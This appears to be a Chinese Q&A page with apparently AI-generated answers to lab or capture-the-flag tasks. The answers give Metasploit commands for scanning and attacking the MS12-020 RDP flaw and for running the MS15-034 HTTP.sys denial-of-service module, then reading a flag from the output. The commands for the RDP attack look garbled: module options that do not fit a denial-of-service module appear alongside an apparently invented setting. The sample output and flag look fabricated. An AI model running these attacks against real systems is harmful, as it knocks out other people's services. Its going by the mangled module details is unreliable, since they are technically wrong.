使用set命令设置目标IP,并检测靶机是否存在漏洞,运行此模块,将回显结果中倒数第2行的最后一个单词作为Flag值提交;命令
时间: 2024-02-16 08:03:03 浏览: 124
在设置目标IP后,您可以使用以下命令来运行MS12-020漏洞扫描模块,并将回显结果中倒数第2行的最后一个单词作为Flag值:
```
use auxiliary/scanner/rdp/ms12_020_check
set RHOSTS <目标IP>
run
```
注意将`<目标IP>`替换为您要扫描的目标IP地址。运行完成后,找到回显结果中倒数第2行的最后一个单词即可作为Flag值提交。
相关问题
进入靶机关闭远程桌面服务,再次运行MS12020RDP拒绝服务漏洞的攻击模块,运行此模块并将回显结果中倒数第2行的最后一个单词作为Flag值提交。
请注意,未经授权的攻击是违法行为,本平台不提倡也不支持此类行为。以下是在靶机关闭远程桌面服务后利用MS12-020漏洞进行攻击的命令:
```
use exploit/windows/rdp/ms12_020_maxchannelids
set RHOST <目标IP>
set PAYLOAD <payload名称>
set LHOST <本地IP>
set LPORT <本地端口>
set DisableRemoteDesktop 1
exploit
```
请将`<目标IP>`替换为您要攻击的目标IP地址,将`<payload名称>`替换为您要使用的有效载荷名称,将`<本地IP>`替换为您的本地IP地址,将`<本地端口>`替换为您要使用的本地端口号。运行完成后,找到回显结果中倒数第2行的最后一个单词即可作为Flag值提交。
进入靶机在IIS网站下的编辑输出缓存设置中禁止启用内核缓存,再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,运行此模块并将回显结果中倒数第2行的最后一个单词作为Flag值提交命令
好的,以下是在禁用内核缓存后再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,并获取Flag值的命令:
```
use auxiliary/dos/windows/http/ms15_034_http_sys_memory_dos
set RHOST <目标IP>
set THREADS <线程数>
set RPORT <目标端口>
run
```
请将`<目标IP>`替换为您要攻击的目标IP地址,`<线程数>`替换为要使用的线程数量,建议默认值为1,`<目标端口>`为要攻击的目标端口,默认值为80。
执行完毕后,将回显结果中倒数第2行的最后一个单词作为Flag值提交即可。例如:
```
[*] Sending DoS packets to <目标IP>:80 (press CTRL+C to stop)
[-] <目标IP> - DoS failed: Connection refused
[*] Auxiliary module execution completed
```
则Flag值为:`completed`。
阅读全文
相关推荐















